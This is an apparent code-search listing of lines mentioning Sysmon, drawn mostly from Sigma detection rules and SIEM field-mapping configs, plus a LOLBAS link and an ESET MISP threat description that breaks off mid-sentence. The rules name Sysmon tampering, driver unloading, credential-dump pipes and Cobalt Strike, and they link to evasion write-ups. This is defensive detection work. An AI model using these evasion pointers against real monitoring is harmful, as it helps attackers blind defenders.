sigma |
godmode_sigma_rule.yml |
service: sysmon |
DRL 1.0 |
sigma |
cron_files.yml |
- https://github.com/microsoft/MSTIC-Sysmon/blob/main/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml |
DRL 1.0 |
sigma |
win_alert_mimikatz_keywords.yml |
EventID: 15 # Sysmon's FileStream Events (could cause false positives when Sigma rules get copied on/to a system) |
DRL 1.0 |
sigma |
win_sysmon_channel_reference_deletion.yml |
title: Sysmon Channel Reference Deletion |
DRL 1.0 |
sigma |
win_sysmon_channel_reference_deletion.yml |
description: Potential threat actor tampering with Sysmon manifest and eventually disabling it |
DRL 1.0 |
sigma |
win_sysmon_channel_reference_deletion.yml |
- https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html |
DRL 1.0 |
sigma |
win_sysmon_channel_reference_deletion.yml |
- 'WINEVT\Channels\Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
sigma |
win_user_driver_loaded.yml |
- https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ |
DRL 1.0 |
sigma |
win_tool_psexec.yml |
description: Detects PsExec service installation and execution events (service and Sysmon) |
DRL 1.0 |
sigma |
sysmon_ads_executable.yml |
definition: 'Requirements: Sysmon config with Imphash logging activated' |
DRL 1.0 |
sigma |
file_event_win_mal_adwind.yml |
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
DRL 1.0 |
sigma |
file_event_win_mal_vhd_download.yml |
definition: in sysmon add "<TargetFilename condition="end with">.vhd</TargetFilename> <!--vhd files for ZLoader and lazarus malware vectors -->" |
DRL 1.0 |
sigma |
file_event_win_quarkspw_filedump.yml |
# Sysmon: File Creation (ID 11) |
DRL 1.0 |
sigma |
file_event_win_susp_clr_logs.yml |
- https://github.com/olafhartong/sysmon-modular/blob/master/11_file_create/include_dotnet.xml |
DRL 1.0 |
sigma |
file_event_win_susp_clr_logs.yml |
definition: Check your sysmon configuration for monitoring of the UsageLogs folder. The SwiftOnSecurity configuration already includes it, thanks to @SBousseaden |
DRL 1.0 |
sigma |
file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml |
- https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ |
DRL 1.0 |
sigma |
file_event_win_tool_psexec.yml |
description: Detects PsExec service installation and execution events (service and Sysmon) |
DRL 1.0 |
sigma |
image_load_suspicious_dbghelp_dbgcore_load.yml |
filter2: # Not available in Sysmon, but in Aurora |
DRL 1.0 |
sigma |
image_load_wmi_module_load.yml |
- 'C:\Windows\Sysmon.exe' |
DRL 1.0 |
sigma |
image_load_wsman_provider_image_load.yml |
filter_svchost: # not available in Sysmon data, but Aurora logs |
DRL 1.0 |
sigma |
pipe_created_apt_turla_namedpipes.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
sigma |
pipe_created_cred_dump_tools_named_pipes.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
sigma |
pipe_created_efspotato_namedpipe.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
sigma |
pipe_created_mal_cobaltstrike.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
sigma |
pipe_created_mal_cobaltstrike_re.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
sigma |
pipe_created_mal_namedpipes.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
sigma |
pipe_created_psexec_pipes_artifacts.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
sigma |
pipe_created_susp_cobaltstrike_pipe_patterns.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
sigma |
pipe_created_susp_wmi_consumer_namedpipe.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
sigma |
pipe_created_tool_psexec.yml |
description: Detects PsExec service installation and execution events (service and Sysmon) |
DRL 1.0 |
sigma |
pipe_created_tool_psexec.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
sigma |
proc_access_win_cmstp_execution_by_access.yml |
- https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
DRL 1.0 |
sigma |
proc_access_win_in_memory_assembly_execution.yml |
description: Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious. |
DRL 1.0 |
sigma |
proc_access_win_in_memory_assembly_execution.yml |
- https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/ |
DRL 1.0 |
sigma |
proc_creation_win_bypass_squiblytwo.yml |
- Hashes\|contains: # Sysmon field hashes contains all types |
DRL 1.0 |
sigma |
proc_creation_win_cmstp_com_object_access.yml |
- https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
DRL 1.0 |
sigma |
proc_creation_win_cmstp_execution_by_creation.yml |
- https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
DRL 1.0 |
sigma |
proc_creation_win_exploit_cve_2019_1388.yml |
IntegrityLevel: 'System' # for Sysmon users |
DRL 1.0 |
sigma |
proc_creation_win_exploit_cve_2019_1388.yml |
- 'NT AUTHORITY\SYSTEM' # for non-Sysmon users - English language settings |
DRL 1.0 |
sigma |
proc_creation_win_false_sysinternalsuite.yml |
- '\Sysmon.exe' |
DRL 1.0 |
sigma |
proc_creation_win_hacktool_imphashes.yml |
- Hashes\|contains: # Sysmon field hashes contains all types |
DRL 1.0 |
sigma |
proc_creation_win_hack_wce.yml |
- Hashes\|contains: # Sysmon field hashes contains all types |
DRL 1.0 |
sigma |
proc_creation_win_malware_formbook.yml |
# e.g. wscript.exe /B sysmon-install.vbs |
DRL 1.0 |
sigma |
proc_creation_win_malware_notpetya.yml |
- '.dat #1' # Sysmon removes comma |
DRL 1.0 |
sigma |
proc_creation_win_mal_adwind.yml |
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
DRL 1.0 |
sigma |
proc_creation_win_rasautou_dll_execution.yml |
definition: Since options '-d' and '-p' were removed in Windows 10 this rule is relevant only for Windows before 10. And as Windows 7 doesn't log command line in 4688 by default, to detect this attack you need Sysmon 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud) |
DRL 1.0 |
sigma |
proc_creation_win_renamed_binary.yml |
description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. |
DRL 1.0 |
sigma |
proc_creation_win_renamed_binary_highly_relevant.yml |
description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. |
DRL 1.0 |
sigma |
proc_creation_win_susp_char_in_cmd.yml |
#find the sysmon event |
DRL 1.0 |
sigma |
proc_creation_win_susp_child_process_as_system_.yml |
definition: ParentUser field needs sysmon >= 13.30 |
DRL 1.0 |
sigma |
proc_creation_win_susp_diskshadow.yml |
definition: 'Requirements: Sysmon ProcessCreation logging must be activated and Windows audit must Include command line in process creation events' |
DRL 1.0 |
sigma |
proc_creation_win_susp_findstr_385201.yml |
description: Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). |
DRL 1.0 |
sigma |
proc_creation_win_susp_findstr_385201.yml |
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service |
DRL 1.0 |
sigma |
proc_creation_win_susp_register_cimprovider.yml |
definition: 'Requirements: Sysmon ProcessCreation logging must be activated and Windows audit must Include command line in process creation events' |
DRL 1.0 |
sigma |
proc_creation_win_susp_rundll32_by_ordinal.yml |
- '.dll #' # Sysmon removes , in its log |
DRL 1.0 |
sigma |
proc_creation_win_susp_workfolders.yml |
definition: 'Requirements: Sysmon ProcessCreation logging must be activated' |
DRL 1.0 |
sigma |
proc_creation_win_sysmon_driver_unload.yml |
title: Sysmon Driver Unload |
DRL 1.0 |
sigma |
proc_creation_win_sysmon_driver_unload.yml |
description: Detect possible Sysmon driver unload |
DRL 1.0 |
sigma |
proc_creation_win_sysmon_driver_unload.yml |
- https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon |
DRL 1.0 |
sigma |
proc_creation_win_tool_psexec.yml |
description: Detects PsExec service installation and execution events (service and Sysmon) |
DRL 1.0 |
sigma |
proc_creation_win_uac_bypass_wsreset.yml |
description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config |
DRL 1.0 |
sigma |
proc_creation_win_uninstall_sysmon.yml |
title: Uninstall Sysinternals Sysmon |
DRL 1.0 |
sigma |
proc_creation_win_uninstall_sysmon.yml |
description: Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion |
DRL 1.0 |
sigma |
proc_creation_win_uninstall_sysmon.yml |
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon |
DRL 1.0 |
sigma |
proc_creation_win_uninstall_sysmon.yml |
sysmon: |
DRL 1.0 |
sigma |
proc_creation_win_uninstall_sysmon.yml |
- \Sysmon.exe |
DRL 1.0 |
sigma |
proc_creation_win_uninstall_sysmon.yml |
condition: sysmon |
DRL 1.0 |
sigma |
registry_event_add_local_hidden_user.yml |
description: Sysmon registry detection of a local hidden user account. |
DRL 1.0 |
sigma |
registry_event_cmstp_execution_by_registry.yml |
- https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
DRL 1.0 |
sigma |
registry_event_cobaltstrike_service_installs.yml |
In some SIEMs you can also catch those events in HKLM\System\ControlSet001\Services or HKLM\System\ControlSet002\Services; however, this rule is based on regular Sysmon events. |
DRL 1.0 |
sigma |
registry_event_disable_microsoft_office_security_features.yml |
definition: key must be added to the sysmon configuration to work |
DRL 1.0 |
sigma |
registry_event_disable_microsoft_office_security_features.yml |
# Sysmon |
DRL 1.0 |
sigma |
registry_event_disable_security_events_logging_adding_reg_key_minint.yml |
# Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one |
DRL 1.0 |
sigma |
registry_event_mal_adwind.yml |
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
DRL 1.0 |
sigma |
registry_event_mal_netwire.yml |
Note: You likely will have to change the sysmon configuration file. |
DRL 1.0 |
sigma |
registry_event_mal_netwire.yml |
Per SwiftOnSecurity "Because Sysmon runs as a service, it has no filtering ability for, |
DRL 1.0 |
sigma |
registry_event_new_dll_added_to_appcertdlls_registry_key.yml |
# Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one |
DRL 1.0 |
sigma |
registry_event_removal_amsi_registry_key.yml |
definition: key must be added to the sysmon configuration to work |
DRL 1.0 |
sigma |
registry_event_suspicious_keyboard_layout_load.yml |
- https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files |
DRL 1.0 |
sigma |
registry_event_suspicious_keyboard_layout_load.yml |
definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files' |
DRL 1.0 |
sigma |
registry_event_susp_service_installed.yml |
- https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ |
DRL 1.0 |
sigma |
registry_event_telemetry_persistence.yml |
definition: 'Requirements: Sysmon config that monitors \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController subkey of the HKLU hives' |
DRL 1.0 |
sigma |
sysmon_accessing_winapi_in_powershell_credentials_dumping.yml |
service: sysmon |
DRL 1.0 |
sigma |
sysmon_config_modification.yml |
title: Sysmon Configuration Change |
DRL 1.0 |
sigma |
sysmon_config_modification.yml |
description: Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying to manipulate the configuration |
DRL 1.0 |
sigma |
sysmon_config_modification.yml |
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon |
DRL 1.0 |
sigma |
sysmon_config_modification.yml |
service: sysmon |
DRL 1.0 |
sigma |
sysmon_config_modification_error.yml |
title: Sysmon Configuration Error |
DRL 1.0 |
sigma |
sysmon_config_modification_error.yml |
description: Someone tries to hide from Sysmon |
DRL 1.0 |
sigma |
sysmon_config_modification_error.yml |
- https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html |
DRL 1.0 |
sigma |
sysmon_config_modification_status.yml |
title: Sysmon Configuration Modification |
DRL 1.0 |
sigma |
sysmon_config_modification_status.yml |
description: Someone tries to hide from Sysmon |
DRL 1.0 |
sigma |
sysmon_config_modification_status.yml |
- https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html |
DRL 1.0 |
sigma |
sysmon_config_modification_status.yml |
- 'Sysmon config state changed' |
DRL 1.0 |
sigma |
sysmon_dcom_iertutil_dll_hijack.yml |
service: sysmon |
DRL 1.0 |
sigma |
sysmon_process_hollowing.yml |
title: Sysmon Process Hollowing Detection |
DRL 1.0 |
sigma |
sysmon_process_hollowing.yml |
- https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/ |
DRL 1.0 |
sigma |
sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml |
definition: Works only if Sysmon events are enriched with additional information about the process (ParentOfParentImage); check the enrichment section |
DRL 1.0 |
sigma |
sysmon_process_reimaging.yml |
# Sysmon v.10.0 or newer is required for proper detection. |
DRL 1.0 |
sigma |
sysmon_process_reimaging.yml |
service: sysmon |
DRL 1.0 |
sigma |
win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml |
definition: Works only if Sysmon events are enriched with additional information about the process (ParentIntegrityLevel); check the enrichment section |
DRL 1.0 |
sigma |
win_possible_privilege_escalation_using_rotten_potato.yml |
definition: Works only if Sysmon events are enriched with additional information about the process (ParentUser); check the enrichment section |
DRL 1.0 |
sigma |
backend_config.yml |
sysmon: true |
DRL 1.0 |
sigma |
collection_repeat.yml |
service: sysmon |
DRL 1.0 |
sigma |
arcsight.yml |
service: sysmon |
DRL 1.0 |
sigma |
arcsight.yml |
deviceProduct: Sysmon |
DRL 1.0 |
sigma |
chronicle.yml |
#DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 |
DRL 1.0 |
sigma |
crowdstrike.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
crowdstrike.yml |
service: sysmon |
DRL 1.0 |
sigma |
devo-windows.yml |
windows-service-sysmon: |
DRL 1.0 |
sigma |
elk-windows.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
elk-windows.yml |
service: sysmon |
DRL 1.0 |
sigma |
elk-windows.yml |
EventLog: Microsoft-Windows-Sysmon |
DRL 1.0 |
sigma |
elk-winlogbeat-sp.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
elk-winlogbeat-sp.yml |
service: sysmon |
DRL 1.0 |
sigma |
elk-winlogbeat-sp.yml |
log_name: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
sigma |
elk-winlogbeat.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
elk-winlogbeat.yml |
service: sysmon |
DRL 1.0 |
sigma |
elk-winlogbeat.yml |
log_name: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
sigma |
fireeye-helix.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
fireeye-helix.yml |
service: sysmon |
DRL 1.0 |
sigma |
fireeye-helix.yml |
channel: Microsoft-Windows-Sysmon |
DRL 1.0 |
sigma |
hawk.yml |
product_name: "Sysmon" |
DRL 1.0 |
sigma |
hawk.yml |
windows-sysmon-status: |
DRL 1.0 |
sigma |
hawk.yml |
windows-sysmon-error: |
DRL 1.0 |
sigma |
hawk.yml |
windows-wmi-sysmon: |
DRL 1.0 |
sigma |
hawk.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
hawk.yml |
service: sysmon |
DRL 1.0 |
sigma |
hawk.yml |
product_name: 'Sysmon' |
DRL 1.0 |
sigma |
helk.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
helk.yml |
service: sysmon |
DRL 1.0 |
sigma |
helk.yml |
index: logs-endpoint-winevent-sysmon-* |
DRL 1.0 |
sigma |
logstash-windows.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
logstash-windows.yml |
service: sysmon |
DRL 1.0 |
sigma |
logstash-windows.yml |
Channel: Microsoft-Windows-Sysmon |
DRL 1.0 |
sigma |
netwitness-epl.yml |
service: sysmon |
DRL 1.0 |
sigma |
netwitness.yml |
service: sysmon |
DRL 1.0 |
sigma |
powershell.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
powershell.yml |
service: sysmon |
DRL 1.0 |
sigma |
powershell.yml |
LogName: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
sigma |
splunk-windows.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
splunk-windows.yml |
service: sysmon |
DRL 1.0 |
sigma |
splunk-windows.yml |
source: 'WinEventLog:Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
sigma |
sumologic-cse.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
sumologic-cse.yml |
service: sysmon |
DRL 1.0 |
sigma |
sumologic.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
sumologic.yml |
service: sysmon |
DRL 1.0 |
sigma |
sumologic.yml |
EventChannel: Microsoft-Windows-Sysmon |
DRL 1.0 |
sigma |
thor.yml |
service: sysmon |
DRL 1.0 |
sigma |
thor.yml |
service: sysmon |
DRL 1.0 |
sigma |
thor.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
thor.yml |
service: sysmon |
DRL 1.0 |
sigma |
thor.yml |
- "WinEventLog:Microsoft-Windows-Sysmon/Operational" |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
service: sysmon |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
winlog.channel: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
# Sysmon/Operational up to ID 25 |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
ParentUser: winlog.event_data.ParentUser #Sysmon 13.30 |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
SourceUser: winlog.event_data.SourceUser #Sysmon 13.30 |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
TargetUser: winlog.event_data.TargetUser #Sysmon 13.30 |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
#SourceIsIpv6: winlog.event_data.SourceIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
#DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
QueryStatus: sysmon.dns.status |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
IsExecutable: sysmon.file.is_executable |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
Archived: sysmon.file.archived |
DRL 1.0 |
sigma |
winlogbeat-modules-enabled.yml |
# SYSMON Hashes |
DRL 1.0 |
sigma |
winlogbeat-old.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
winlogbeat-old.yml |
service: sysmon |
DRL 1.0 |
sigma |
winlogbeat-old.yml |
log_name: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
sigma |
winlogbeat.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
winlogbeat.yml |
service: sysmon |
DRL 1.0 |
sigma |
winlogbeat.yml |
winlog.channel: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
sigma |
zircolite.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
zircolite.yml |
service: sysmon |
DRL 1.0 |
sigma |
zircolite.yml |
Channel: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
sigma |
sysmon.yml |
title: Conversion of Generic Rules into Sysmon Specific Rules |
DRL 1.0 |
sigma |
sysmon.yml |
service: sysmon |
DRL 1.0 |
sigma |
sysmon.yml |
service: sysmon |
DRL 1.0 |
sigma |
windows-services.yml |
windows-sysmon: |
DRL 1.0 |
sigma |
windows-services.yml |
service: sysmon |
DRL 1.0 |
sigma |
windows-services.yml |
Channel: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
LOLBAS |
FltMC.yml |
- Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon |
|
malware-ioc |
misp_invisimole.json |
"https://docs.microsoft.com/sysinternals/downloads/sysmon", |
© ESET 2014-2018 |
malware-ioc |
oceanlotus-rtf_ocx_campaigns.misp.event.json |
"description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate\/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed\/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux\/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform\/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. 
The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files\/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. 
Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL\/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", |
© ESET 2014-2018 |
malware-ioc |
misp-turla-powershell-event.json |
"description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, 